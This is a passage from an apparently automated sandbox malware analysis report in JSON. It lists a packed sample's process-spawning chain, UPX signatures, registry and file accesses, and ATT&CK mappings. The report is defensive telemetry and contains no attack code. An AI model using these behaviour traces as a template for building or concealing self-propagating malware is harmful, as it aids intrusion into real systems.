00000000-00003776)\n Spawned process \"6644682.exe\" (UID: 00000000-00004584)\n Spawned process \"4442828.exe\" (UID: 00000000-00003716)\n Spawned process \"080068.exe\" (UID: 00000000-00004316)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" was detected as \"UPX\" and name: \"Packer\"\n \"rhnvfjn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hlrxpfj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4080482.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2286284.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2020002.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"06062.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8808880.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dptrvt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nxthl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"606282.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"402060.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"422022.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0066646.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"066460.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6400262.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"njxth.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rhnnvfl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ddxvh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"trrfx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ldprbfj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rndlb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nxdndh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"242220.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"66846.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f42e76@RPCRT4.dll\"\n \"15001600c03e816b@ADVAPI32.dll\"\n \"0e000f00703f816b@ADVAPI32.dll\"\n \"0e000f00cc3f816b@ADVAPI32.dll\"\n \"11001200b447816b@ADVAPI32.dll\"\n \"110012004848816b@ADVAPI32.dll\"\n \"120013008c48816b@ADVAPI32.dll\"\n \"12001300e448816b@ADVAPI32.dll\"\n \"14001500386e816b@ADVAPI32.dll\"\n \"14001500506e816b@ADVAPI32.dll\"\n \"14001500686e816b@ADVAPI32.dll\"\n \"17001800806e816b@ADVAPI32.dll\"\n \"0d000e00986e816b@ADVAPI32.dll\"\n \"11001200a86e816b@ADVAPI32.dll\"\n \"11001200bc6e816b@ADVAPI32.dll\"\n \"0f001000fc6f816b@ADVAPI32.dll\"\n \"140015003c70816b@ADVAPI32.dll\"\n \"140015005470816b@ADVAPI32.dll\"\n \"0c000d009c70816b@ADVAPI32.dll\"\n \"0c000d00ac70816b@ADVAPI32.dll\"\n \"0e000f00bc70816b@ADVAPI32.dll\"\n \"0e000f00cc70816b@ADVAPI32.dll\"\n \"0b000c00dc70816b@ADVAPI32.dll\"\n \"180019001473816b@RPCRT4.dll\"\n \"130014004073816b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"ltnxl.exe\" called \"CreateProcessA\" with parameter \"c:\\rllbfv.exe\" - (UID: 00000000-00006140)\n \"264608.exe\" called \"CreateProcessA\" with parameter \"c:\\hbxvf.exe\" - (UID: 00000000-00004228)\n \"04028.exe\" called \"CreateProcessA\" with parameter \"c:\\jjtpnvv.exe\" - (UID: 00000000-00002064)\n \"jjtpnvv.exe\" called \"CreateProcessA\" with parameter \"c:\\vfvxb.exe\" - (UID: 00000000-00001428)\n \"llrlf.exe\" called \"CreateProcessA\" with parameter \"c:\\djblbb.exe\" - (UID: 00000000-00003604)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an executable section named \"UPX0\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an executable section named \"UPX1\"\n \"rhnvfjn.exe\" has an executable section named \"UPX0\"\n \"rhnvfjn.exe\" has an executable section named \"UPX1\"\n \"hlrxpfj.exe\" has an executable section named \"UPX0\"\n \"hlrxpfj.exe\" has an executable section named \"UPX1\"\n \"4080482.exe\" has an executable section named \"UPX0\"\n \"4080482.exe\" has an executable section named \"UPX1\"\n \"2286284.exe\" has an executable section named \"UPX0\"\n \"2286284.exe\" has an executable section named \"UPX1\"\n \"2020002.exe\" has an executable section named \"UPX0\"\n \"2020002.exe\" has an executable section named \"UPX1\"\n \"06062.exe\" has an executable section named \"UPX0\"\n \"06062.exe\" has an executable section named \"UPX1\"\n \"8808880.exe\" has an executable section named \"UPX0\"\n \"8808880.exe\" has an executable section named \"UPX1\"\n \"dptrvt.exe\" has an executable section named \"UPX0\"\n \"dptrvt.exe\" has an executable section named \"UPX1\"\n \"nxthl.exe\" has an executable section named \"UPX0\"\n \"nxthl.exe\" has an executable section named \"UPX1\"\n \"606282.exe\" has an executable section named \"UPX0\"\n \"606282.exe\" has an executable section named \"UPX1\"\n \"402060.exe\" has an executable section named \"UPX0\"\n \"402060.exe\" has an executable section named \"UPX1\"\n \"422022.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an writable section named \"UPX0\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an writable section named \"UPX1\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an writable section named \"UPX2\"\n \"rhnvfjn.exe\" has an writable section named \"UPX0\"\n \"rhnvfjn.exe\" has an writable section named \"UPX1\"\n \"rhnvfjn.exe\" has an writable section named \"UPX2\"\n \"hlrxpfj.exe\" has an writable section named \"UPX0\"\n \"hlrxpfj.exe\" has an writable section named \"UPX1\"\n \"hlrxpfj.exe\" has an writable section named \"UPX2\"\n \"4080482.exe\" has an writable section named \"UPX0\"\n \"4080482.exe\" has an writable section named \"UPX1\"\n \"4080482.exe\" has an writable section named \"UPX2\"\n \"2286284.exe\" has an writable section named \"UPX0\"\n \"2286284.exe\" has an writable section named \"UPX1\"\n \"2286284.exe\" has an writable section named \"UPX2\"\n \"2020002.exe\" has an writable section named \"UPX0\"\n \"2020002.exe\" has an writable section named \"UPX1\"\n \"2020002.exe\" has an writable section named \"UPX2\"\n \"06062.exe\" has an writable section named \"UPX0\"\n \"06062.exe\" has an writable section named \"UPX1\"\n \"06062.exe\" has an writable section named \"UPX2\"\n \"8808880.exe\" has an writable section named \"UPX0\"\n \"8808880.exe\" has an writable section named \"UPX1\"\n \"8808880.exe\" has an writable section named \"UPX2\"\n \"dptrvt.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rhnvfjn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hlrxpfj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4080482.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2286284.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2020002.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"06062.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8808880.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dptrvt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nxthl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"606282.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"402060.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"422022.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0066646.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"066460.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6400262.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"njxth.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rhnnvfl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ddxvh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"trrfx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ldprbfj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rndlb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nxdndh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"242220.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"66846.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"vnxhhp.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" reads file \"c:\\67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" reads file \"c:\\vnxhhp.exe\"\n \"vnxhhp.exe\" reads file \"c:\\vnxhhp.exe\"\n \"vnxhhp.exe\" reads file \"c:\\hvnjft.exe\"\n \"hvnjft.exe\" reads file \"c:\\hvnjft.exe\"\n \"hvnjft.exe\" reads file \"c:\\lxpbndn.exe\"\n \"lxpbndn.exe\" reads file \"c:\\lxpbndn.exe\"\n \"lxpbndn.exe\" reads file \"c:\\8284862.exe\"\n \"8284862.exe\" reads file \"c:\\8284862.exe\"\n \"8284862.exe\" reads file \"c:\\2664824.exe\"\n \"2664824.exe\" reads file \"c:\\2664824.exe\"\n \"2664824.exe\" reads file \"c:\\rbndhnn.exe\"\n \"rbndhnn.exe\" reads file \"c:\\rbndhnn.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\VNXHHP.EXE\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vnxhhp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hvnjft.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lxpbndn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8284862.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2664824.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbndhnn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ltnxl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rllbfv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jvvbdv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nnpjtv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbpjdh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vnxlf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"68804.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"264608.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hbxvf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"djhdv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vvlhl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ndnvnh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nhxhrtb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hhprhp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fjprrfr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nxxhj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6644682.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4442828.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"67D4588FF46156A2C2CE7C68405FAA77C37384ADB7FEA589176985CA4B27E1AC\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"c:\\vnxhhp.exe\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" trying to access non-existent file 